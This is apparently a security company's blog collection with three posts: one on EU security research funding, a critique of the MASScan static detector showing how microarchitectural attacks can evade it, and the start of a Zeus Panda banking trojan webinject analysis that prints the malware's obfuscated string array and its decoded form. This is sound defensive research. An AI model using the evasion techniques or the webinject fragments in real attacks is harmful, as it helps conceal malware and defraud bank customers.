Security for Sale? – On Security Research Funding in Europe

On Wednesday, Feb. 22, 2017, a collective of 20 journalists from eleven countries published their research on the European security industry. The article, Security for Sale, published at The Correspondent, mostly seems to revolve around the question of how the funding that several players in the field received from the Horizon 2020 (H2020) and FP7 framework programmes is put to use for the European people. H2020 is the European Commission’s current funding initiative for research and innovation. Here is the commission’s own explanation.

Simplified, the authors of Security for Sale conclude that the benefit of funding security research for Europe as a whole is limited, but that the funding works pretty well as hidden subsidies for the industry itself. Their wording is more lenient than mine, but nevertheless I feel that the picture the authors draw is incomplete and I’d like to add another perspective. I can only assume that the data for this article stems from the Secure Societies line of funding, as its core topics are emphasized in the article and some of the articles it links to refer to that – the article regrettably does not contain any straightforward references to its sources. And in my opinion, the Secure Societies line of funding does indeed sometimes yield research results that are scary to everyone who did not answer the question of ‘how do we want to live?’ with ‘I liked the setting depicted in Minority Report quite a bit, but it’s missing the effectiveness of Judge Dredd’.

The authors describe the landscape in the security sector roughly as 1) the big players, where kinetic and digital technology converge, 2) research organizations, 3) universities, and 4) small and medium enterprises (SMEs). Our sector, of Ze Great Cybers, primarily hides in 4) and to some extent increasingly in 1). The article does not explicitly touch the field of information security, and neither do many calls in the Secure Societies context. However, most of the projects need to touch the digital domain at some point or other, making it clear that a division between information security and all the other potential flavors of security is merely artificial, given our current state of technology. As the authors observe, this is also reflected by the upcoming funding opportunities:

“similar programs are being set up for cybersecurity and military research”

The EU and some of its member states are late to the game and I’m aware that not everybody hacking at computers likes the notion that InfoSec and defense converge. I also dislike the idea and I somehow liked the Internet better when it was still a lot emptier, or as Halvar Flake once put it:

However, I came to enjoy civilization and, like most people, I rely on the critical infrastructures that make our societies tick. I’ve been leading incident response assignments in hospitals more than once in the last year and as a human who may suddenly require the services of a hospital at some point or another, I am very grateful for the effort and dedication my colleagues and the clients’ staff put into resolving the respective incidents. If this means I’m working in defense now, then I still dislike the notion, but I see that the work is necessary and also that we need to think more on the European scale when we want to protect the integrity of our societies. Packets only stop at borders of oppressive societies and that shouldn’t be us.

Now let’s have a look at where the EU’s security research funds go to, according to the article. The authors state

“Companies received by far the most money. That’s not particularly surprising; these same companies were the ones influencing funding policy.”

and illustrate it with the following figure:

Figure 1: Security research funding distribution. Illustration by The Correspondent.

In 2015, I was directly responsible for four H2020 grant applications and consulted on several other applications for nationally or regionally managed funding opportunities. Security in its various flavors is a tiny part of the picture. I’m happy to state that we had an above-average success rate. The illustration in the article struck me as familiar: to me, Figure 1 simply shows a typical distribution of funding within the majority of grant applications I’ve worked on. So it is hardly surprising that the global distribution of funding within the technology sector of the programme looks very similar. There is nothing much sinister to that.

Larger corporations do have more opportunities to influence policy, as they can afford the time/resources to lobby. But the main reason for the distribution is salaries on the one hand and grant policy on the other. An engineer working at a large corporation will be more expensive by a factor of 1.2 to 2.3 than a PhD student, depending on the country and the respective corporation. A factor of ~1.9, as in the figure, does not look unreasonable, given that the figure accounts for accumulated costs, not just personnel, and that it is more likely that a corporation or a research institute will take the effort of building a demonstrator or pilot installations of a technology, as universities regrettably tend to lack monetization strategies for research results.

Government entities, as the next in line, tend to have very limited personnel resources for research projects and do not have a lot of wiggle room when it comes to contributions. With a funding scope that aims at technological advances, funding for advisories is often politically limited, and rightly so. As the figures are very much aggregated, I can only assume that the complete sum also contains Coordination and Support Actions (CSAs), which are rather limited funding schemes, financially speaking, that aim at connecting related projects and generally at the systematization of knowledge to avoid arriving at one insight at twice or thrice the funding. This work is sometimes done by entities that could classify as advisories. ‘Other’ can be translated to network and dissemination partners, or dedicated project management (which makes a lot of sense, as H2020 projects can be large in terms of the number of partners).

Now let’s not talk militarizing corporations enriching themselves, as the article’s authors suggest, let’s talk research funding effectiveness. In my conversations with the granting side of research funding, it is a constant pain that a significant number of funded research projects do not amount to a product. I have seen quite a few projects where I would judge without hesitation that the project was a WoMBaT (i.e., Waste of Money, Brains, and Time) and did primarily serve to compensate for the lack of public funding towards universities.

But that is only a small part of the picture. Another part is that there is a very expensive zone between ‘things you can publish’ and ‘things you can actually use’. Simplifying, technological progress has a tendency to increase complexity. To specify its expectations regarding the results of a funding measure, the European Commission adopted NASA’s Technology Readiness Levels (TRL). In the rather broad field of engineering, the requirement often ranges from a validation under lab conditions (TRL 4) to a working prototype under field conditions (TRL 7), depending on the class of funding action. The funding of a given project often ends at that point.

Using my terminology from above, in the best case you then have something you can publish and/or show off, i.e., an interesting approach that has been shown to be feasible. Between that and monetization are the roughly two to seven years you’ll often need in engineering to go from a prototype to a product. And strictly speaking, research funding ends here, because research ends here. There are almost no publicly funded actions that will allow you to go towards product development, although piloting of a technology in the field can be funded (TRL 9). Nevertheless, either a company is now able to fund the continued development towards a product, or not. This is still a limited view, as I don’t need a new product to monetize research results. It is just as desirable to improve an existing set of products and services, based on new research results. It is, however, by far not as visible.

Now why so much funding for the big players? Research grants tend to have a bias towards those applicants who were able to successfully complete a project, presented impressively in the past and are generally held in good standing. Sounds familiar? Yep, sounds like selecting talks for Black Hat or any other non-academic security conference, where the process is single-blind and the committee needs to judge based only on an abstract, not a full paper with a proper evaluation section and extensive related work. If the data is relatively poor, judgment needs to rely on the applicants’ reputation and previous work to some extent. And in comparison to a well-backed research paper, grant applications are in their nature always speculative, although very much more detailed than the abstract of a conference submission. If one knew how something was done in the first place, there’d be no need to call it research and there’d be no reason for a grant. The important point is not to fail, if one wants to continue receiving grants (cf. bias, above).

And that still does not fully account for the observation that big players are doing very well in grant applications. An H2020 application is a lot of work: it’s often a hundred pages just for sections 1 to 3, which can easily amount to 100 person days for the coordinator until everything is properly polished. The acceptance rate for Research and Innovation Actions can be as low as 6%. Academic Tier-1 conferences are relaxed in comparison. A small company may simply be unable to compete, economically, i.e., it cannot accept the realistic risk of putting a lot of effort into naught. It’s not as hard in other types of actions, but the risk is still significant and acceptance rates have been getting worse, not better.
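
To put rough numbers on that risk, here is a back-of-the-envelope sketch using the two figures quoted above (100 person days per application, 6% acceptance). It assumes, purely for illustration, that every application costs the same effort and that outcomes are independent of each other; neither assumption comes from the article or from the Commission.

```javascript
// Back-of-the-envelope estimate; both inputs are the figures quoted in the text.
const personDaysPerApplication = 100; // coordinator effort for one proposal
const acceptanceRate = 0.06;          // low end quoted for Research and Innovation Actions

// Assumption: independent attempts with identical odds (geometric distribution),
// so the expected number of applications until the first success is 1 / p.
function expectedApplications(p) {
  return 1 / p;
}

// Expected total effort spent until one proposal is funded.
function expectedPersonDays(effortPerApplication, p) {
  return effortPerApplication * expectedApplications(p);
}

const attempts = expectedApplications(acceptanceRate);
const effort = expectedPersonDays(personDaysPerApplication, acceptanceRate);
console.log(`~${attempts.toFixed(1)} applications, ~${Math.round(effort)} person days per funded project`);
```

Under these simplifying assumptions, a coordinator would on average write roughly 17 proposals and sink well over 1,600 person days before one is funded, which is a bet a large organization can spread across many calls and a small company usually cannot.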

“Our investigation reveals that EU security policy emphasizes technology: a high-tech solution is being sought for a societal problem.”

From an outside position I feel that I’m unable to judge the intention and the mindset of the various individuals responsible for the actual wording of the H2020 calls. The persons from this context I’ve met in the past did, however, not leave an impression of exceptional naivety. I genuinely believe that it is in the best interest of European countries and the EU to fund security research, without denying that there may be recipients of funds with a questionable ethical standard. As Europeans, we need to address these issues. I do not want to live in a militarized society and I don’t believe in solving societal problems purely through technology. However, I see a significant amount of opportunities, where usable, efficient technology can enable solutions for societal problems. Given my socialization, I may have a bias towards the security spectrum of research, but that said, I see quite a few things that can and should be done to positively impact the security of our societies. In a changing political climate, Europe needs to step up its security game, also and especially in the digital domain.

And now excuse me, I need to continue that research grant proposal. I’m not doing that for kicks, nor purely out of self-interest.

MASScan & the Problems of Static Detection of Microarchitectural attacks

 

Introduction

Microarchitectural attacks have been known for more than a decade now.  The designs behind those architectures are typically optimized for performance, cost and backward compatibility. Therefore it seems unlikely that we will see fixes in CPU architectures which address the root cause for vulnerabilities any time soon. With this in mind, the search for software-based solutions to this problem becomes a priority.

As a contribution to this effort, Irazoqui et al. [1] published an interesting paper on static methods to detect microarchitectural attacks, titled “MASScan: Stopping Microarchitectural Attacks Before Execution”.
The idea is as good as it is naïve. In this blog post I will discuss the reasons behind this position. It should also be noted that the paper in question is an early version and subject to changes.

 

MASScan

The analysis works by flagging code that is rare in real-life applications and often used in an attack context. In this case, ‘attack context’ is defined as code which is either required for an attack to work or improves an attack’s performance. The list is:

Cache flushing instructions

clflush, clflushopt
(the authors do not mention clflushopt, but I have included it for completeness)

Non-temporal instructions

movnti & movntdq

Timers

Counter threads, performance counters, rdtscp, rdtsc instructions and attempts to set thread affinity to gain core co-location, which is important for the accuracy of counter threads.

Fences

lfence, mfence & cpuid

Locking instructions

lock prefix

Algorithmic constructions

Eviction set access code, pointer chasing, jumps in a loop
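
To make the flagging idea concrete, here is a minimal sketch of a byte-pattern scanner for a few of the instructions listed above. It is not MASScan's implementation (the paper works on disassembly and more features); the function names and the sample buffer are made up for illustration, and only a handful of encodings are covered.

```javascript
// Fixed x86 encodings for some of the instructions on the list.
const FIXED_PATTERNS = [
  { name: "rdtsc", bytes: [0x0f, 0x31] },
  { name: "rdtscp", bytes: [0x0f, 0x01, 0xf9] },
  { name: "cpuid", bytes: [0x0f, 0xa2] },
  { name: "lfence", bytes: [0x0f, 0xae, 0xe8] },
  { name: "mfence", bytes: [0x0f, 0xae, 0xf0] },
];

// True if `bytes` occurs in `code` starting at `offset`.
function matchesAt(code, offset, bytes) {
  if (offset + bytes.length > code.length) return false;
  return bytes.every((b, k) => code[offset + k] === b);
}

// clflush m8 is encoded as 0F AE /7: ModRM.reg must be 7 and ModRM.mod must
// not be 3 (a register operand with reg == 7 would be sfence instead).
function isClflushAt(code, offset) {
  if (offset + 3 > code.length) return false;
  if (code[offset] !== 0x0f || code[offset + 1] !== 0xae) return false;
  const modrm = code[offset + 2];
  const mod = modrm >> 6;
  const reg = (modrm >> 3) & 7;
  return reg === 7 && mod !== 3;
}

// Naive scan: test every byte offset, without knowing instruction boundaries.
function scan(code) {
  const hits = [];
  for (let offset = 0; offset < code.length; offset++) {
    for (const p of FIXED_PATTERNS) {
      if (matchesAt(code, offset, p.bytes)) hits.push({ offset, name: p.name });
    }
    if (isClflushAt(code, offset)) hits.push({ offset, name: "clflush" });
  }
  return hits;
}

// Hypothetical sample: nop; rdtsc; clflush [rax]; mfence
const sample = [0x90, 0x0f, 0x31, 0x0f, 0xae, 0x38, 0x0f, 0xae, 0xf0];
console.log(scan(sample));
```

Because the sketch tests every offset, it will also fire on data bytes and on immediates that merely happen to contain these sequences. That is the trade-off any purely syntactic detector has to make.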

 

The instructions in question are rarely ever used. With the exception of the lock prefix, all of them are part of the 0x0F escape opcodes. In Z0mbie’s [5] opcode list (which unfortunately is outdated at the time of writing) 0x0F opcodes represent less than 2% of all opcodes, based on data from 1700 executables. The lock prefix is measured, but is rounded down to 0% in this list. This could serve as an indication that vindicates the authors’ notion.

The good part is that solid static analysis is able to effectively spot problems, and highlight them to a human analyst. Further manual analysis can be performed based on those indicators to identify malignant behavior, suspicious cases or to vet out false positives. What makes this approach somewhat challenging is the fact that static analysis is very difficult to do well and impossible to do right, especially when factoring in that attackers try to actively evade static analysis.
The following is to demonstrate what such an evasive action might look like.

 

Microarchitectural & Rice

Rice’s theorem states that all non-trivial semantic properties of programs are undecidable. In short, obfuscation is difficult to deal with. The bad news is that whether a program performs a microarchitectural attack is a non-trivial semantic property and as such, as per Rice’s theorem, undecidable. In other words: you could achieve the same result in an infinite number of ways, without being able to pinpoint the “right” way. You will never be able to deduce from the semantics alone all the syntactic representations that produce it.

The example I like to use is this: One could build an interpreter which takes the original program as input. The output of the interpreter would then have the exact same semantics, but a different syntax. Obviously one could then build a new interpreter that processes the first interpreter’s syntax output and so on and so forth. Consequently, we cannot generate a database of syntactic representations for a given semantic. The clever reader will already know that microarchitectural attacks do not lend themselves well to emulation, or to obfuscation for that matter. They often rely on rare syntax elements (rare instructions). Execution time is a very real concern and any obfuscation might change microarchitectural states that are important to the attack. However, this doesn’t mean it’s impossible.
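
The gap between syntax and semantics can be shown with a deliberately trivial sketch. The two source strings and the "signature" below are invented for illustration; the point is only that a detector matching on syntax misses a program with identical behavior.

```javascript
// Two source texts with identical semantics (both return 42) but different syntax.
const plainSource = "return 6 * 7;";
const rewrittenSource = "let r = 0; for (let i = 0; i < 7; i++) { r += 6; } return r;";

// Hypothetical syntactic signature: flags any source containing the text "6 * 7".
function matchesSignature(source) {
  return source.includes("6 * 7");
}

// Execute a source text as a function body and return its result.
function run(source) {
  return new Function(source)();
}

console.log(run(plainSource) === run(rewrittenSource)); // same behavior
console.log(matchesSignature(plainSource), matchesSignature(rewrittenSource)); // different verdicts
```

Adding the rewritten variant to the signature database does not help, since the same rewriting step can be applied again to produce yet another syntax.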

Let’s go through the above list from an attacker’s point of view.

Cache flushing instructions

The clflush instructions can be replaced by eviction code as demonstrated by Oren et al. [2] as well as Gruss et al. [3]. This relocates the problem from detecting dangerous instructions to detecting dangerous algorithms. It effectively disqualifies the syntactic element clflush for use as an answer to a semantic question.

Non-temporal instructions & timers

Timers are indeed the Achilles heel of most microarchitectural attacks. The rdtsc(p) instructions are a telltale sign for such an attack. Unfortunately, though, they are used by benign applications as well. Often these instructions are wrapped in API functions, e.g. the QueryPerformanceCounter API on Microsoft Windows. The problem with such API calls is that they can be imported dynamically in any number of ways. This makes a static analysis fairly cumbersome.
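
The dynamic-import problem has a direct analogue in script languages. The following sketch uses JavaScript's Date.now as a stand-in for a timer API; the signature string and function names are assumptions made for the example and are not taken from the paper.

```javascript
// Hypothetical signature a static scanner might look for in source text.
const SIGNATURE = "Date.now";

function looksLikeTimerUse(source) {
  return source.includes(SIGNATURE);
}

// Direct use: the API name appears verbatim in the source.
function directTimer() {
  return Date.now();
}

// Indirect use: the same API is resolved from name fragments at run time,
// similar in spirit to resolving an export by name instead of importing it.
function indirectTimer() {
  const holder = globalThis[["Da", "te"].join("")];
  const method = ["n", "ow"].join("");
  return holder[method]();
}

console.log(looksLikeTimerUse(directTimer.toString()));   // the signature is present
console.log(looksLikeTimerUse(indirectTimer.toString())); // the signature is absent
console.log(typeof indirectTimer());                      // yet the timer is still read
```

A static tool would have to evaluate the string operations to recover the name, and an attacker can make those operations arbitrarily elaborate.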

Counter Threads

As for counter threads, they too can be implemented in numerous ways. Counting does not have to be monotonically increasing, only deterministically changing. As the CPUs are superscalar, some instructions can be added to the loop at a very low accuracy penalty. And of course, the loop can be camouflaged. This not only obscures the actual nature of a function (e.g. a counter thread), it also takes the detection into potential false positive territory. Finally, some attacks (like attacks on KASLR) can be repeated. This allows a low-accuracy timer to be used multiple times, with the law of large numbers averaging out the noise.
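
The averaging argument can be illustrated with a small simulation. All numbers here are hypothetical (latencies of 100 and 300 "cycles", a timer error of up to 500 in either direction), and the noise comes from a seeded pseudo-random generator rather than from real hardware.

```javascript
// Small seeded PRNG (mulberry32) so the simulation is repeatable.
function mulberry32(seed) {
  let a = seed >>> 0;
  return function () {
    a = (a + 0x6d2b79f5) >>> 0;
    let t = a;
    t = Math.imul(t ^ (t >>> 15), t | 1);
    t ^= t + Math.imul(t ^ (t >>> 7), t | 61);
    return ((t ^ (t >>> 14)) >>> 0) / 4294967296;
  };
}

// Hypothetical values: the timer error is larger than the gap we want to see.
const FAST = 100;
const SLOW = 300;
const NOISE = 500;

// One reading of a poor timer: true latency plus uniform noise in [-NOISE, NOISE).
function noisyMeasure(trueLatency, rand) {
  return trueLatency + (rand() * 2 - 1) * NOISE;
}

// Repeat the measurement and average; the noise shrinks with the sample count.
function averagedMeasure(trueLatency, samples, rand) {
  let sum = 0;
  for (let i = 0; i < samples; i++) sum += noisyMeasure(trueLatency, rand);
  return sum / samples;
}

const rand = mulberry32(1);
const fastMean = averagedMeasure(FAST, 10000, rand);
const slowMean = averagedMeasure(SLOW, 10000, rand);
console.log(fastMean.toFixed(1), slowMean.toFixed(1));
```

A single reading cannot separate the two cases, but the two averages end up close to the true latencies. The attacker pays for this in run time, not in detectability.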

Fences

Fences are rarely a strict requirement for attacks. They do tend to lower the noise, but an attack could often do without them. For instance, Oren et al. [2] do prime+probe in JavaScript without a fence. Flush+Reload works fairly decently without fencing as well. Also, makeshift fences can in some cases be produced by gaming reordering. For instance, filling the reorder buffer with dependent instructions before starting a round of the attack will serve well to fence against already pending loads and stores.

Locking instructions

I’m not aware of any substitution for the lock prefix. In this particular case, we indeed have an indicator that is difficult to replace for an attacker. It should be noted that on Microsoft Windows the Interlocked* API functions use the lock prefix and consequently the same problems arise as with the QueryPerformanceCounter API.

Algorithmic constructions

As far as algorithmic constructions are concerned, those can be varied and obfuscated ad nauseam. Therefore, they make for a poor indicator.
For instance, you could perform eviction using a vector, a tree structure or, in fact, any other data structure. Each of them will generate completely different code. Eviction can be triggered by any instruction that uses memory – therefore, any such instruction would achieve this. A very old approach has been memset, which comes at a steep performance penalty for the attacker. However, it would likely suffice for spying on keyboards as in Gruss et al. [4]. Call qword ptr [address] can touch two cache lines to load the address and one on the stack, as well as the one or two where the instruction itself lies. That is just an example of how ugly eviction can be made. One could object that this carries a performance penalty. However, we should bear in mind that optimal eviction strategies not only touch uncached memory, but also memory that is already cached – see Gruss et al. [3]!
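
As a rough illustration of "any data structure will do", the sketch below walks the same number of memory locations once through a flat buffer and once through a linked chain. It is not a working eviction strategy: the 64-byte line size is an assumption, JavaScript objects have no guaranteed memory layout, and whether anything is actually evicted depends on cache size and associativity.

```javascript
const LINE = 64; // assumed cache line size in bytes

// Variant 1: touch one byte per assumed cache line of a flat buffer.
function touchWithStride(buffer) {
  let touched = 0;
  let sink = 0;
  for (let offset = 0; offset < buffer.length; offset += LINE) {
    sink ^= buffer[offset]; // the read is the point; sink keeps it from being unused
    touched++;
  }
  return { touched, sink };
}

// Variant 2: build a singly linked chain and chase its pointers.
function buildChain(length) {
  let head = null;
  for (let i = length - 1; i >= 0; i--) head = { payload: i & 0xff, next: head };
  return head;
}

function touchWithChain(head) {
  let touched = 0;
  let sink = 0;
  for (let node = head; node !== null; node = node.next) {
    sink ^= node.payload;
    touched++;
  }
  return { touched, sink };
}

const buffer = new Uint8Array(4096);
console.log(touchWithStride(buffer).touched, touchWithChain(buildChain(64)).touched);
```

Both functions perform the same number of reads, yet they share almost no syntax, which is what makes "eviction code" such a slippery thing to write a signature for.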

It gets worse from there: For row hammer, I suggested that we need not use eviction at all. Instead, we could bring the cache coherency policy into play to cause write-back into memory, see Fogh [8]. This provides yet another algorithm to detect for protection against row hammer, which of course can be implemented in many different ways.

 

Classic malware obfuscation – Anti static analysis methods

 

Copy protections and malware have historically used a number of methods to defeat static analysis.

Self-modifying code

I wrote my first executable packer in 1995. Packers go back further than that, though. Once an executable has been packed, the only code still available to static analysis is the unpacker stub. Unfortunately, malware authors are aware of this technique, and it is even available for purchase online as part of COTS malware as a service. Also, packers used commercially for copy protection can be used for obfuscation like this.

Malware can of course also decrypt data and save it as an executable on disk or even in memory to avoid static analysis. Techniques such as “Run-PE” are widespread in real world malware.
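
What static analysis gets to see of a packed program can be shown with a toy example. The single-byte XOR "packer" below is a deliberately simplistic stand-in (real packers compress, encrypt and relocate native code); the key, the payload and the function names are all invented for the illustration.

```javascript
const KEY = 0x5a; // hypothetical single-byte key

// "Pack": turn source text into an array of XOR-ed character codes.
function pack(source) {
  return Array.from(source, (ch) => ch.charCodeAt(0) ^ KEY);
}

// "Unpack": reverse the XOR and rebuild the source text.
function unpack(packed) {
  return String.fromCharCode(...packed.map((b) => b ^ KEY));
}

// The stub is the only code present in clear text: unpack, then execute.
function stubRun(packed) {
  return new Function(unpack(packed))();
}

const payload = "return typeof Date.now();";
const packed = pack(payload);
const onDisk = JSON.stringify(packed); // what a static scanner would inspect

console.log(onDisk.includes("Date.now")); // the signature is gone
console.log(stubRun(packed));             // the behavior is unchanged
```

The scanner is left with the stub and an opaque blob; everything of interest only exists after the stub has run.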

Another example of self-modifying code is JIT compiling, which is what JavaScript engines do. In fact, I use the Keystone assembler JIT-style for building microarchitectural attacks fairly often, because it gives me a lot more control than I get from the compiler.

Opening hidden browser windows using malicious JavaScript is entirely possible, and Oren et al. [2] demonstrate that prime+probe runs well in JavaScript. It is worth noting that the browser components can be linked into the malware and subsequently do not need to be present on the victim’s computer.

Such ways of hiding code from analysis are already commonplace and no longer qualify as sophistication in malware.

Anti-disassembly and code reuse

Static analysis can be performed based either on source code or on disassembly. Commercial providers, however, tend not to share their source code for intellectual property reasons. This only leaves disassembly as a method for analysis. Unfortunately, however, the x86 platform has variable-length instructions. This makes it hard to locate the starting point of an instruction. Historically this has been used as a means to thwart disassembly. A clflush instruction can easily be hidden from disassembly as part of, say, a mov instruction. The extreme version of this is doing code-reuse attacks such as ROP. Obviously a clflush “gadget” does not have to be part of the shipped malware, but could very well be part of the operating system – clflush (in its simplest form) assembles to 3 bytes of which the attacker can influence the third by picking the operand, making it reasonable to find a suitable gadget somewhere in the operating system.
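
The mov trick can be made concrete with six bytes. The decoder below is a toy that only knows the four encodings used in the example, so it is a sketch of the effect and not a disassembler; the byte sequence itself is a valid x86 encoding (in 64-bit mode the hidden instruction reads as clflush [rax]).

```javascript
// Toy length decoder covering only the opcodes used in this example.
function decodeAt(code, i) {
  const op = code[i];
  if (op === 0xb8) return { name: "mov eax, imm32", length: 5 };
  if (op === 0x90) return { name: "nop", length: 1 };
  if (op === 0xc3) return { name: "ret", length: 1 };
  if (op === 0x0f && code[i + 1] === 0xae && code[i + 2] === 0x38) {
    return { name: "clflush [rax]", length: 3 };
  }
  return { name: "unknown", length: 1 };
}

// Linear sweep: decode one instruction, skip its length, repeat.
function linearSweep(code, start) {
  const names = [];
  for (let i = start; i < code.length; ) {
    const insn = decodeAt(code, i);
    names.push(insn.name);
    i += insn.length;
  }
  return names;
}

// B8 0F AE 38 90 = mov eax, 0x9038AE0F, followed by C3 = ret.
const bytes = [0xb8, 0x0f, 0xae, 0x38, 0x90, 0xc3];

console.log(linearSweep(bytes, 0)); // what the disassembler shows
console.log(linearSweep(bytes, 1)); // what executes after a jump to offset 1
```

Disassembled from the start, the buffer is a harmless mov and a ret. Entered one byte later, for instance via a computed jump, the immediate operand executes as clflush followed by nop and ret.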

 

A peculiar niche case

We have already seen static analysis thwart these kinds of attacks in one special instance: the NaCl sandbox in Chrome. In there, the code is validated during compiling and run in a sandboxed environment to make sure that none of the above tricks are used. Validation will fail if a clflush instruction is generated. Unfortunately, this is not generally applicable. Nevertheless, requiring an intermediate language representation (say LLVM) when submitting to a shop may assist the authors’ intention, but many of the issues mentioned above, including Rice’s theorem itself, apply to intermediate language representations as well.

 

Conclusion

At this point in time, attackers capable of launching microarchitectural attacks have to be considered ‘advanced’. We must therefore assume that they have ready access to malware obfuscation technology. This technology can effectively thwart classification using static analysis of executables – this is especially true if the “feature set” is small and malleable. This limited feature set further reduces the cost of applying obfuscation for the attacker. The feature set of MASScan is exactly that: small and malleable. Microarchitectural attacks generally have a bit of leeway for modification to blend in with benign code. Consequently, static analysis is unlikely to give defenders a real edge. Static analysis could be augmented with symbolic or even concolic analysis to improve accuracy. However, these methods scale poorly and have issues of their own. Given that it produces a <6% false positive ratio, static analysis seems a dull weapon against microarchitectural attacks. This leaves the dynamic approach, which I consider the most promising stop-gap solution.
For instance, my flush+flush detection blog post [7] or my work with Herath on detecting row hammer and cache attacks at Black Hat 2015 using performance counters [6] are examples of how detecting microarchitectural attacks can be automated in controlled environments. These methods are not without flaws, either. But from an attacker’s point of view they are at least more difficult to work around, as they are often behavior-based and consequently circumvent the problem presented by Rice’s theorem. Despite progress in defense research, we remain without strong defenses against microarchitectural attacks.

 

Literature

[1] Irazoqui, G., Eisenbarth, T., and Sunar, B. MASScan: Stopping Microarchitectural Attacks Before Execution. http://eprint.iacr.org/2016/1196.pdf

[2] Oren, Y., Kemerlis, V. P., Sethumadhavan, S., and Keromytis, A. D. The spy in the sandbox: Practical cache attacks in JavaScript and their implications. In Proceedings of the 22nd ACM SIGSAC Conference on Computer and Communications Security (New York, NY, USA, 2015), CCS ’15, ACM, pp. 1406-1418.

[3] Gruss, D., Maurice, C., and Mangard, S. Rowhammer.js: A remote software-induced fault attack in JavaScript. In Proceedings of the 13th International Conference on Detection of Intrusions and Malware, and Vulnerability Assessment - Volume 9721 (New York, NY, USA, 2016), DIMVA 2016, Springer-Verlag New York, Inc., pp. 300-321.

[4] Gruss, D., Spreitzer, R., and Mangard, S. Cache template attacks: Automating attacks on inclusive last-level caches. In 24th USENIX Security Symposium (2015), USENIX Association, pp. 897-912.

[5] Z0mbie, “Opcode Frequency Statistics”. http://z0mbie.daemonlab.org/opcodes.html

[6] Herath, N., Fogh, A. “These Are Not Your Grand Daddy’s CPU Performance Counters”. Black Hat 2015. See also http://dreamsofastone.blogspot.de/2015/08/speaking-at-black-hat.html

[7] Fogh, A. Detecting stealth mode cache attacks: Flush+Flush. http://dreamsofastone.blogspot.de/2015/11/detecting-stealth-mode-cache-attacks.html

[8] Fogh, A. Row hammer, java script and MESI. http://dreamsofastone.blogspot.de/2016/02/row-hammer-java-script-and-mesi.html

Zeus Panda Webinjects: a case study

Our mothership G DATA runs an extensive automated sample processing infrastructure as part of providing up-to-date protection to their AV customers. At G DATA Advanced Analytics, we have integrated these processes within our own routines in order to maintain the fraud detection solutions we provide to our customers from the financial sector.

We have been observing an increase in Zeus Panda infections recently. When we decrypted the config files from samples of Zeus Panda Banking Trojans that went through our processing this week, we decided to have a closer look at the current features. The low level functionality of the Zeus Panda Banking Trojan is already known quite well, so we focus our analysis on the webinjects. These webinjects are used to manipulate the functionality of the target online banking websites on the client. The one we found here was pretty interesting. As usual, the JavaScript is protected by an obfuscation layer, which substitutes string and function names using the following mapping array:

var _0x2f90 = ["", "\x64\x6F\x6E\x65", "\x63\x61\x6C\x6C\x65\x65", "\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x3F\x74\x69\x6D\x65\x3D", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x68\x65\x61\x64", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65", "\x76\x65\x72", "\x46\x46", "\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72", "\x44\x4F\x4D\x43\x6F\x6E\x74\x65\x6E\x74\x4C\x6F\x61\x64\x65\x64", "\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65", "\x63\x6F\x6D\x70\x6C\x65\x74\x65", "\x6D\x73\x69\x65\x20\x36", "\x69\x6E\x64\x65\x78\x4F\x66", "\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65", "\x75\x73\x65\x72\x41\x67\x65\x6E\x74", "\x49\x45\x36", "\x6D\x73\x69\x65\x20\x37", "\x49\x45\x37", "\x6D\x73\x69\x65\x20\x38", "\x49\x45\x38", "\x6D\x73\x69\x65\x20\x39", "\x49\x45\x39", "\x6D\x73\x69\x65\x20\x31\x30", "\x49\x45\x31\x30", "\x66\x69\x72\x65\x66\x6F\x78", "\x4F\x54\x48\x45\x52", "\x5F\x62\x72\x6F\x77\x73\x2E\x63\x61\x70", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64", "\x64\x69\x73\x70\x6C\x61\x79", "\x73\x74\x79\x6C\x65", "\x6E\x6F\x6E\x65", "\x68\x74\x6D\x6C", "\x70\x6F\x73\x69\x74\x69\x6F\x6E", "\x66\x69\x78\x65\x64", "\x74\x6F\x70", "\x30\x70\x78", "\x6C\x65\x66\x74", "\x77\x69\x64\x74\x68", "\x31\x30\x30\x25", "\x68\x65\x69\x67\x68\x74", "\x7A\x49\x6E\x64\x65\x78", "\x39\x39\x39\x39\x39\x39", "\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64", "\x23\x46\x46\x46\x46\x46\x46"];
// ... further script code ...

After deobfuscating this script, the result looks like:

var vars = ["", "done", "callee", "script", "createElement", "type", "text/javascript", "src", "?time=", "appendChild", "head", "getElementsByTagName", "ver", "FF", "addEventListener", "DOMContentLoaded", "readyState", "complete", "msie 6", "indexOf", "toLowerCase", "userAgent", "IE6", "msie 7", "IE7", "msie 8", "IE8", "msie 9", "IE9", "msie 10", "IE10", "firefox", "OTHER", "_brows.cap", "getElementById", "display", "style", "none", "html", "position", "fixed", "top", "0px", "left", "width", "100%", "height", "zIndex", "999999", "background", "#FFFFFF"];
// ... further script code ...
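
The string-decoding step of such a deobfuscation can be sketched in a few lines. This is not the tooling we used, only a minimal illustration: it operates on the script as text, rewrites \xNN escapes to the characters they stand for, and leaves everything else untouched. The function name is made up, and the sample input is a shortened excerpt of the mapping array above.

```javascript
// Replace every \xNN escape in a source text with the character it encodes.
function decodeHexEscapes(source) {
  return source.replace(/\\x([0-9A-Fa-f]{2})/g, (_match, hex) =>
    String.fromCharCode(parseInt(hex, 16))
  );
}

// String.raw keeps the backslashes, so this is the script as it appears on the wire.
const obfuscated = String.raw`var _0x2f90 = ["", "\x64\x6F\x6E\x65", "\x63\x61\x6C\x6C\x65\x65"];`;

console.log(decodeHexEscapes(obfuscated));
// prints: var _0x2f90 = ["", "done", "callee"];
```

A sturdier version would have to re-escape decoded quotes and backslashes so that the output remains valid JavaScript; for this sample that case does not occur.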

Taking a closer look at the now revealed functionality, we can identify the following features:

  • Browser version check, to add a browser specific event listener (e.g. for Firefox the DOMContentLoaded event is used)
  • Setting some trojan configuration variables like:
    • botid: Unique Identifier of the compromised system
    • inject: URL to load the next attack stage
